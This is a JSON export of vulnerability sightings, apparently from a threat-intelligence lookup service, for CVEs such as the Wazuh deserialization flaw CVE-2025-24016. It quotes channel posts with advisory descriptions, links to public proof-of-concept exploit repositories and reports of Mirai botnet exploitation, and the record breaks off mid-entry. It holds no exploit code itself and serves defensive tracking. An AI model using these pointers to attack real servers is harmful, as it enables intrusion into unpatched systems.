{"vulnerability": "cve-2025-2401", "sightings": [{"uuid": "b0edf5eb-0ecd-48cc-8055-a21d1c9590e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-04)", "content": "", "creation_timestamp": "2026-04-04T00:00:00.000000Z"}, {"uuid": "9d26a802-a404-4757-b58b-4466f0f371a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://t.me/cvedetector/17606", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24016 - Wazuh DistributedAPI Remote Code Execution Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-24016 \nPublished : Feb. 10, 2025, 8:15 p.m. | 1\u00a0hour, 28\u00a0minutes ago \nDescription : Wazuh is a free and open source platform used for threat prevention, detection, and response. Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability allows for remote code execution on Wazuh servers. DistributedAPI parameters are a serialized as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`). If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code. The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh servers in the cluster) or, in certain configurations, even by a compromised agent. Version 4.9.1 contains a fix. \nSeverity: 9.9 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"10 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-10T22:57:00.000000Z"}, {"uuid": "df600c85-a023-4fa0-b923-14e659392383", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24011", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/22020", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aUmbraco User Enum - CVE-2025-24011 PoC\nURL\uff1ahttps://github.com/Puben/CVE-2025-24011-PoC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-21T22:29:56.000000Z"}, {"uuid": "f5e1be68-8237-4eb1-98e7-5269fa25ec16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24014", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2373", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24014\n\ud83d\udd39 Description: Vim is an open source, command line text editor. A segmentation fault was found in Vim before 9.1.1043. In silent Ex mode (-s -e), Vim typically doesn't show a screen and just operates silently in batch mode. However, it is still possible to trigger the function that handles the scrolling of a gui version of Vim by feeding some binary characters to Vim. The function that handles the scrolling however may be triggering a redraw, which will access the ScreenLines pointer, even so this variable hasn't been allocated (since there is no screen). This vulnerability is fixed in 9.1.1043.\n\ud83d\udccf Published: 2025-01-20T22:53:14.325Z\n\ud83d\udccf Modified: 2025-01-20T22:53:14.325Z\n\ud83d\udd17 References:\n1. https://github.com/vim/vim/security/advisories/GHSA-j3g9-wg22-v955\n2. https://github.com/vim/vim/commit/9d1bed5eccdbb46a26b8a484f5e9163c40e63919", "creation_timestamp": "2025-01-20T23:00:00.000000Z"}, {"uuid": "466b812e-4cf9-49c2-8620-e4cb0b0647e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24019", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2439", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24019\n\ud83d\udd39 Description: YesWiki is a wiki system written in PHP. In versions up to and including 4.4.5, it is possible for any authenticated user, through the use of the filemanager to delete any file owned by the user running the FastCGI Process Manager (FPM) on the host without any limitation on the filesystem's scope. This vulnerability allows any authenticated user to arbitrarily remove content from the Wiki resulting in partial loss of data and defacement/deterioration of the website. In the context of a container installation of YesWiki without any modification, the `yeswiki` files (for example .php) are not owned by the same user (root) as the one running the FPM process (www-data). However in a standard installation, www-data may also be the owner of the PHP files, allowing a malicious user to completely cut the access to the wiki by deleting all important PHP files (like index.php or core files of YesWiki). Version 4.5.0 contains a patch for this issue.\n\ud83d\udccf Published: 2025-01-21T17:36:10.367Z\n\ud83d\udccf Modified: 2025-01-21T17:36:10.367Z\n\ud83d\udd17 References:\n1. https://github.com/YesWiki/yeswiki/security/advisories/GHSA-43c9-gw4x-pcx6\n2. https://github.com/YesWiki/yeswiki/commit/3ddd833d22703caf9025659eb174f7765df7147c", "creation_timestamp": "2025-01-21T18:00:53.000000Z"}, {"uuid": "0262112e-d1de-4ec0-8b9d-7d8eb8d4f3d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24010", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2362", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24010\n\ud83d\udd39 Description: Vite is a frontend tooling framework for javascript. Vite allowed any websites to send any requests to the development server and read the response due to default CORS settings and lack of validation on the Origin header for WebSocket connections. This vulnerability is fixed in 6.0.9, 5.4.12, and 4.5.6.\n\ud83d\udccf Published: 2025-01-20T15:53:30.929Z\n\ud83d\udccf Modified: 2025-01-20T15:53:30.929Z\n\ud83d\udd17 References:\n1. https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6", "creation_timestamp": "2025-01-20T16:01:41.000000Z"}, {"uuid": "b421d4cc-b1c6-405e-8be9-6c3f97ee6aff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24017", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2417", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24017\n\ud83d\udd39 Description: YesWiki is a wiki system written in PHP. Versions up to and including 4.4.5 are vulnerable to any end-user crafting a DOM based XSS on all of YesWiki's pages which is triggered when a user clicks on a malicious link. The vulnerability makes use of the search by tag feature. When a tag doesn't exist, the tag is reflected on the page and isn't properly sanitized on the server side which allows a malicious user to generate a link that will trigger an XSS on the client's side when clicked. This vulnerability allows any user to generate a malicious link that will trigger an account takeover when clicked, therefore allowing a user to steal other accounts, modify pages, comments, permissions, extract user data (emails), thus impacting the integrity, availability and confidentiality of a YesWiki instance. Version 4.5.0 contains a patch for the issue.\n\ud83d\udccf Published: 2025-01-21T15:37:58.654Z\n\ud83d\udccf Modified: 2025-01-21T15:37:58.654Z\n\ud83d\udd17 References:\n1. https://github.com/YesWiki/yeswiki/security/advisories/GHSA-wphc-5f2j-jhvg\n2. https://github.com/YesWiki/yeswiki/commit/c1e28b59394957902c31c850219e4504a20db98b\n3. https://github.com/YesWiki/yeswiki/blob/doryphore-dev/tools/tags/handlers/page/listpages.php#L84", "creation_timestamp": "2025-01-21T16:00:41.000000Z"}, {"uuid": "1d904438-e7c3-42f1-8dec-99c82af2281e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/40005", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24016\nURL\uff1ahttps://github.com/B1ack4sh/Blackash-CVE-2025-24016\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-06-10T21:10:40.000000Z"}, {"uuid": "3ee35340-cfcc-425a-9017-da508bd317f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/33441", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aPatches the RCE Exploit in XWorm\nURL\uff1ahttps://github.com/cybersecplayground/CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-04-21T19:26:00.000000Z"}, {"uuid": "08e128dc-e8f4-4e3f-9727-e7b4fef2d622", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24012", "type": "seen", "source": "Telegram/l8CdnG8WszYoqumyLnFT_CrE_FltaoGvBZIBbslpVNRKyQaA", "content": "", "creation_timestamp": "2025-02-20T23:26:55.000000Z"}, {"uuid": "933bf30b-1d30-414d-bc98-dcba75acff27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/437", "content": "Top Security News for Today\n\nJaguar Land Rover Breached by HELLCAT Ransomware Group Using Its Infostealer Playbook\u2014Then a Second Hacker Strikes  \nhttps://www.reddit.com/r/netsec/comments/1jd7t1f/jaguar_land_rover_breached_by_hellcat_ransomware/\n\nHistory of NULL Pointer Dereferences on macOS  \nhttps://www.reddit.com/r/netsec/comments/1jd7e2j/history_of_null_pointer_dereferences_on_macos/\n\nCVE-2025-24016: Unsafe Deserialization Vulnerability in Wazuh Leading to Remote Code Execution  \nhttps://www.reddit.com/r/netsec/comments/1jd9oed/cve202524016_unsafe_deserialization_vulnerability/\n\n[Tool] TruffleShow: A Client-Side Web Viewer for TruffleHog Outputs  \nhttps://www.reddit.com/r/netsec/comments/1jdcen1/tool_truffleshow_a_clientside_web_viewer_for/\n\n17th March \u2013 Threat Intelligence Report  \nhttps://research.checkpoint.com/2025/17th-march-threat-intelligence-report/\n\nImprovements in Brute Force Attacks  \nhttps://www.schneier.com/blog/archives/2025/03/improvements-in-brute-force-attacks.html\n\nStilachiRAT analysis: From system reconnaissance to cryptocurrency theft  \nhttps://www.microsoft.com/en-us/security/blog/2025/03/17/stilachirat-analysis-from-system-reconnaissance-to-cryptocurrency-theft/\n\nFollow Top Cyber News at https://t.me/TopCyberTechNews Feel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2025-03-18T09:30:24.000000Z"}, {"uuid": "bf7978da-6069-49a5-9f48-cc2c984500bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/5KpqkHLdhavDOziPsV3wCj_hqmHzrkEpONDHycExmylKgM8", "content": "", "creation_timestamp": "2025-07-14T03:00:05.000000Z"}, {"uuid": "6afb4700-a1a4-4d35-b021-aa0dba3a5eaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/Qs9ZZ8VQvn9t_EBdVGO2euibwUjWHRWabFHY-p6t6dUnGBw", "content": "", "creation_timestamp": "2025-06-11T15:00:09.000000Z"}, {"uuid": "89323819-7bf7-4933-ab6b-57ed845248e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://t.me/information_security_channel/53680", "content": "Mirai Botnets Exploiting Wazuh Security Platform Vulnerability\u00a0\nhttps://www.securityweek.com/mirai-botnets-exploiting-wazuh-security-platform-vulnerability/\n\nCVE-2025-24016, a critical remote code execution vulnerability affecting Wazuh servers, has been exploited by Mirai botnets.\nThe post Mirai Botnets Exploiting Wazuh Security Platform Vulnerability\u00a0 (https://www.securityweek.com/mirai-botnets-exploiting-wazuh-security-platform-vulnerability/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2025-06-09T17:14:40.000000Z"}, {"uuid": "db7c23ce-21ae-40b1-bb2d-2c719d902089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24014", "type": "seen", "source": "https://t.me/cvedetector/15905", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24014 - Vim GUI Version Segmentation Fault Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-24014 \nPublished : Jan. 20, 2025, 11:15 p.m. | 43\u00a0minutes ago \nDescription : Vim is an open source, command line text editor. A segmentation fault was found in Vim before 9.1.1043. In silent Ex mode (-s -e), Vim typically doesn't show a screen and just operates silently in batch mode. However, it is still possible to trigger the function that handles the scrolling of a gui version of Vim by feeding some binary characters to Vim. The function that handles the scrolling however may be triggering a redraw, which will access the ScreenLines pointer, even so this variable hasn't been allocated (since there is no screen). This vulnerability is fixed in 9.1.1043. \nSeverity: 4.2 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"21 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-21T01:04:51.000000Z"}, {"uuid": "bd061a94-fef5-4d92-87c4-9321b3691ad5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24013", "type": "seen", "source": "https://t.me/cvedetector/15896", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24013 - CodeIgniter Header Validation Bypass Vulnerability (Remote Denial of Service / Error)\", \n  \"Content\": \"CVE ID : CVE-2025-24013 \nPublished : Jan. 20, 2025, 4:15 p.m. | 43\u00a0minutes ago \nDescription : CodeIgniter is a PHP full-stack web framework. Prior to 4.5.8, CodeIgniter lacked proper header validation for its name and value. The potential attacker can construct deliberately malformed headers with Header class. This could disrupt application functionality, potentially causing errors or generating invalid HTTP requests. In some cases, these malformed requests might lead to a DoS scenario if a remote service\u2019s web application firewall interprets them as malicious and blocks further communication with the application. This vulnerability is fixed in 4.5.8. \nSeverity: 5.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"20 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-20T18:23:22.000000Z"}, {"uuid": "3eae71a6-5e75-432a-a382-62b37bda8a31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24010", "type": "seen", "source": "https://t.me/cvedetector/15895", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24010 - Vite WebSocket CORS Bypass\", \n  \"Content\": \"CVE ID : CVE-2025-24010 \nPublished : Jan. 20, 2025, 4:15 p.m. | 43\u00a0minutes ago \nDescription : Vite is a frontend tooling framework for javascript. Vite allowed any websites to send any requests to the development server and read the response due to default CORS settings and lack of validation on the Origin header for WebSocket connections. This vulnerability is fixed in 6.0.9, 5.4.12, and 4.5.6. \nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"20 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-20T18:23:21.000000Z"}, {"uuid": "c8293de6-737b-4722-a82a-b1d0a5c09c37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/2594", "content": "#exploit\n1. CVE-2024-48248:\nNAKIVO Backup Replication Vulnerability\nhttps://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248\n\n2. CVE-2025-24016:\nWazuh Unsafe Deserialization RCE\nhttps://github.com/0xjessie21/CVE-2025-24016\n\n3. CVE-2025-1094:\nSQLI to RCE via WebSocket\nhttps://github.com/soltanali0/CVE-2025-1094-Exploit", "creation_timestamp": "2025-02-28T07:48:31.000000Z"}, {"uuid": "ad50a3bb-e930-44a2-b781-f367edfc3057", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/3694", "content": "\ud83d\udd2a Wazuh \u2014 Unsafe Deserialization RCE (CVE-2025-24016)\n\nAn unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses. If an attacker injects an unsanitized dictionary into a DAPI request or response, they can craft an unhandled exception, allowing arbitrary Python code execution.\n\n\ud83d\udd17  Source: https://github.com/0xjessie21/CVE-2025-24016\n\n#wazuh #deserialization #rce #cve\n\ud83d\udd39 Share & Support Us \ud83d\udd39\n\ud83d\udcf1 Channel : @ZeroEthical_Course", "creation_timestamp": "2025-02-18T21:26:26.000000Z"}, {"uuid": "15b15ecc-7efa-4eda-b79e-1707a7f627eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/6989", "content": "#exploit\n1. CVE-2024-48248:\nNAKIVO Backup Replication Vulnerability\nhttps://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248\n\n2. CVE-2025-24016:\nWazuh Unsafe Deserialization RCE\nhttps://github.com/0xjessie21/CVE-2025-24016\n\n3. CVE-2025-1094:\nSQLI to RCE via WebSocket\nhttps://github.com/soltanali0/CVE-2025-1094-Exploit", "creation_timestamp": "2025-02-28T07:48:31.000000Z"}, {"uuid": "e9036636-128d-4658-b99c-e36aee9a373a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/DrIoZRFAX_ghcTB2uB2STv6m12W37rsArwIvIxT09N9Ltk3n", "content": "", "creation_timestamp": "2025-04-28T05:58:52.000000Z"}, {"uuid": "d2833406-bfe3-4862-a7ca-b6f52923ba22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24011", "type": "seen", "source": "Telegram/gOetP5mAOx4aFIm7nSS5zyVOI1twGA9d4oDKoHMSrdRCqKWY", "content": "", "creation_timestamp": "2025-02-20T23:26:55.000000Z"}, {"uuid": "2e8d9c8d-542e-4bf3-a1fc-ccf9f402e44b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1570", "content": "#GitHub #Tools\n\nWazuh \u2014 Unsafe Deserialization RCE (CVE-2025-24016)\n\nAn unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses\n\n https://github.com/0xjessie21/CVE-2025-24016\n\nTool for monitor Active Directory changes in real time without getting all objects. Instead of this it use replication metadata and Update Sequence Number (USN) to filter current properties of objects.\n\nhttps://github.com/DrunkF0x/ADSpider\n\nMorgan is a powerful tool designed to help security researchers, developers, and security auditors identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites.\n\nhttps://GitHub.com/VFA250/Morgan\n\n#HackersFactory", "creation_timestamp": "2025-03-05T17:29:45.000000Z"}, {"uuid": "96ad6b86-b90c-4822-8a97-8b6fdd5412fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/abp-92o5hKBAk_DtUBF145InVAyFbzPIrVHjJ0eU3_qJ9UM", "content": "", "creation_timestamp": "2025-04-22T01:00:07.000000Z"}, {"uuid": "a3e6713e-fc2c-40fb-9dfd-ca4c834f62d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24011", "type": "published-proof-of-concept", "source": "Telegram/vxR48xjEP6WBdCVXNbCTjoVsMUt2b0RWUkGzAhfJjXTHV4Q", "content": "", "creation_timestamp": "2025-03-21T16:00:10.000000Z"}, {"uuid": "c3d93442-c6a9-4149-a51c-43117f8dbd69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/FISRGv2_C9Deo8v1NrjPE43U_NehW980T6ZHCVN0ysWZmns", "content": "", "creation_timestamp": "2025-02-16T16:00:19.000000Z"}, {"uuid": "78555fda-678e-4b39-82f1-95c2b7f09be1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11868", "content": "#exploit\n1. CVE-2024-48248:\nNAKIVO Backup Replication Vulnerability\nhttps://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248\n\n2. CVE-2025-24016:\nWazuh Unsafe Deserialization RCE\nhttps://github.com/0xjessie21/CVE-2025-24016\n\n3. CVE-2025-1094:\nSQLI to RCE via WebSocket\nhttps://github.com/soltanali0/CVE-2025-1094-Exploit", "creation_timestamp": "2025-02-27T22:17:19.000000Z"}, {"uuid": "64224ed3-0546-4e73-be77-b6700e662c1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24014", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lg7jp4ztsq2r", "content": "", "creation_timestamp": "2025-01-20T23:49:45.485080Z"}, {"uuid": "257df143-9d6b-4140-9f84-40e933b6091a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24014", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113863162643434691", "content": "", "creation_timestamp": "2025-01-20T22:59:41.357922Z"}, {"uuid": "8f2d9d08-fd2f-4019-a886-2734a8917152", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113981192096573813", "content": "", "creation_timestamp": "2025-02-10T19:16:08.283822Z"}, {"uuid": "d8d59cb7-5d7d-434c-881a-323711350f5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113981200022323322", "content": "", "creation_timestamp": "2025-02-10T19:18:09.799358Z"}, {"uuid": "787b6d75-4a0a-43e3-9697-f91a35088122", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://mastodon.social/users/CyberSignaler/statuses/113981557167246023", "content": "", "creation_timestamp": "2025-02-10T20:49:06.914681Z"}, {"uuid": "4d82811d-fe42-45b4-bffd-220131d14c66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lhuaf6dyiy2e", "content": "", "creation_timestamp": "2025-02-10T22:54:13.477837Z"}, {"uuid": "0f112eeb-97c8-480c-9650-a3b579d49a69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/vulnalerts.bsky.social/post/3lhumdc5ckm2r", "content": "", "creation_timestamp": "2025-02-11T02:27:55.885315Z"}, {"uuid": "6a2aa661-6236-4ac1-ad29-740a7c042b39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3lhxbfuaznk2j", "content": "", "creation_timestamp": "2025-02-12T03:50:33.423208Z"}, {"uuid": "4c1882c8-7ca0-4aa9-b1c9-5103d34cefef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/113990570444579916", "content": "", "creation_timestamp": "2025-02-12T11:01:11.640616Z"}, {"uuid": "1d8af5c3-1704-47ce-a01a-48475355a3c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/obivan/statuses/113991073139943359", "content": "", "creation_timestamp": "2025-02-12T13:09:00.424182Z"}, {"uuid": "e92f36fb-52b7-4fd0-9cc7-f24f8073bbb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/tmjintel.bsky.social/post/3lhyuzf7a3s27", "content": "", "creation_timestamp": "2025-02-12T19:14:06.651506Z"}, {"uuid": "e48615c3-7e3f-4851-b853-c061f773c77c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/ethicalhack3r.bsky.social/post/3li2lnmf3ds22", "content": "", "creation_timestamp": "2025-02-13T11:31:47.939471Z"}, {"uuid": "2016fa30-4e9d-48ed-8ce9-8fc676cc1daf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/tmjintel.bsky.social/post/3li3fgfqtpm24", "content": "", "creation_timestamp": "2025-02-13T19:13:02.286812Z"}, {"uuid": "91ba88a2-1cb5-4e6e-b8ef-2eed36f8acae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24016", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3lkmndgn3sl2o", "content": "", "creation_timestamp": "2025-03-18T02:40:10.883215Z"}, {"uuid": "4f64ec8b-5ad5-496c-896c-dcfa60602cb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/bontchev.infosec.exchange.ap.brid.gy/post/3lkn2pza2djj2", "content": "", "creation_timestamp": "2025-03-18T06:44:01.428575Z"}, {"uuid": "0f06807d-aa7c-4f8b-ad99-8af2fc7c68eb", "vulnerability_lookup_origin": 